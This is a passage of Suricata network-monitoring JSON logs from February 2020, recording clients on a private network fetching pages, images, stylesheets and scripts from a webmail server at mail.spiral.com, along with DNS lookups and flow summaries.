Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-split.png","state":"CLOSED","stored":false,"size":89,"tx_id":8}} {"timestamp":"2020-02-29T00:01:17.397130+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52638,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":24076,"tx_id":3}} {"timestamp":"2020-02-29T00:01:17.398639+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-bg.png","state":"CLOSED","stored":false,"size":74,"tx_id":9}} 
{"timestamp":"2020-02-29T00:01:17.405089+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97}} {"timestamp":"2020-02-29T00:01:17.411548+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96}} {"timestamp":"2020-02-29T00:01:17.412209+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":96},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz.png","state":"CLOSED","stored":false,"size":96,"tx_id":9}} 
{"timestamp":"2020-02-29T00:01:17.412923+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593}} {"timestamp":"2020-02-29T00:01:17.421392+0000","flow_id":1558539106348560,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56244,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5592,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:17.442042+0000","flow_id":876743112598001,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52638,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/ico_message_off.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":468}} {"timestamp":"2020-02-29T00:01:17.446781+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidehoriz-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":97},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidehoriz-bg.png","state":"CLOSED","stored":false,"size":97,"tx_id":10}} {"timestamp":"2020-02-29T00:01:17.526761+0000","flow_id":1558539106348560,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56244,"proto":"UDP","dns":{"type":"answer","id":5592,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:17.526761+0000","flow_id":1558539106348560,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56244,"proto":"UDP","dns":{"type":"answer","id":5592,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:17.619055+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903}} {"timestamp":"2020-02-29T00:01:17.619055+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":11}} {"timestamp":"2020-02-29T00:01:17.654438+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2313,"tx_id":11}} {"timestamp":"2020-02-29T00:01:17.655898+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186}} {"timestamp":"2020-02-29T00:01:17.656035+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reload.gif","http_user_agent":"Mozilla\/5.0 (X11; 
Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13593},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reload.gif","state":"CLOSED","stored":false,"size":13593,"tx_id":10}} {"timestamp":"2020-02-29T00:01:17.658172+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/personal.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":186},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/personal.png","state":"CLOSED","stored":false,"size":186,"tx_id":12}} {"timestamp":"2020-02-29T00:01:17.672130+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132}} 
{"timestamp":"2020-02-29T00:01:17.674459+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/answered.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":132},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/answered.png","state":"CLOSED","stored":false,"size":132,"tx_id":13}} {"timestamp":"2020-02-29T00:01:17.683138+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257}} {"timestamp":"2020-02-29T00:01:17.685104+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206}} 
{"timestamp":"2020-02-29T00:01:17.685273+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/za.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":257},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/za.png","state":"CLOSED","stored":false,"size":257,"tx_id":14}} {"timestamp":"2020-02-29T00:01:17.686251+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:01:17.686434+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":206},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen.png","state":"CLOSED","stored":false,"size":206,"tx_id":11}} {"timestamp":"2020-02-29T00:01:17.688181+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442}} {"timestamp":"2020-02-29T00:01:17.688705+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-active-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":15}} 
{"timestamp":"2020-02-29T00:01:17.689101+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":442},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/inbox.png","state":"CLOSED","stored":false,"size":442,"tx_id":12}} {"timestamp":"2020-02-29T00:01:17.689842+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":16,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424}} {"timestamp":"2020-02-29T00:01:17.690769+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} 
{"timestamp":"2020-02-29T00:01:17.691700+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52646,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/trash.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/trash.png","state":"CLOSED","stored":false,"size":312,"tx_id":13}} {"timestamp":"2020-02-29T00:01:17.692989+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52640,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/sent.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":424},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/folders\/sent.png","state":"CLOSED","stored":false,"size":424,"tx_id":16}} {"timestamp":"2020-02-29T00:01:17.733381+0000","flow_id":788481534977091,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52646,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":351}} {"timestamp":"2020-02-29T00:01:17.737302+0000","flow_id":116207484000165,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52640,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":17,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/folders\/folder.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":211}} {"timestamp":"2020-02-29T00:01:18.000667+0000","flow_id":1743257055554502,"event_type":"flow","src_ip":"192.168.10.81","src_port":52626,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":773,"bytes_toclient":767,"start":"2020-02-29T00:00:12.224198+0000","end":"2020-02-29T00:00:17.231773+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:18.000924+0000","flow_id":67704414066182,"event_type":"flow","src_ip":"192.168.10.81","src_port":52624,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1402,"bytes_toclient":2795,"start":"2020-02-29T00:00:12.185862+0000","end":"2020-02-29T00:00:17.230742+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:01:18.001076+0000","flow_id":937559845345076,"event_type":"flow","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":22,"pkts_toclient":20,"bytes_toserver":3698,"bytes_toclient":15034,"start":"2020-02-29T00:00:09.562996+0000","end":"2020-02-29T00:00:17.317658+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:19.991004+0000","flow_id":1043121556102940,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37302,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39943,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:20.096028+0000","flow_id":1043121556102940,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37302,"proto":"UDP","dns":{"type":"answer","id":39943,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:20.096028+0000","flow_id":1043121556102940,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37302,"proto":"UDP","dns":{"type":"answer","id":39943,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:20.243435+0000","flow_id":752305025627883,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44785,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20497,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:01:20.270208+0000","flow_id":1393011066924782,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34690,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6136}} {"timestamp":"2020-02-29T00:01:20.354683+0000","flow_id":752305025627883,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44785,"proto":"UDP","dns":{"type":"answer","id":20497,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:20.354683+0000","flow_id":752305025627883,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44785,"proto":"UDP","dns":{"type":"answer","id":20497,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:20.522450+0000","flow_id":2014930921353933,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34692,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6966}} 
{"timestamp":"2020-02-29T00:01:22.216915+0000","flow_id":1610366476737736,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52642,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927},"app_proto":"http","fileinfo":{"filename":"\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":22457,"tx_id":2}} {"timestamp":"2020-02-29T00:01:22.217017+0000","flow_id":1463401285748420,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52648,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/base64.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1962},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/external\/base64.js","state":"CLOSED","stored":false,"size":6586,"tx_id":3}} {"timestamp":"2020-02-29T00:01:22.217071+0000","flow_id":948834138972290,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52644,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
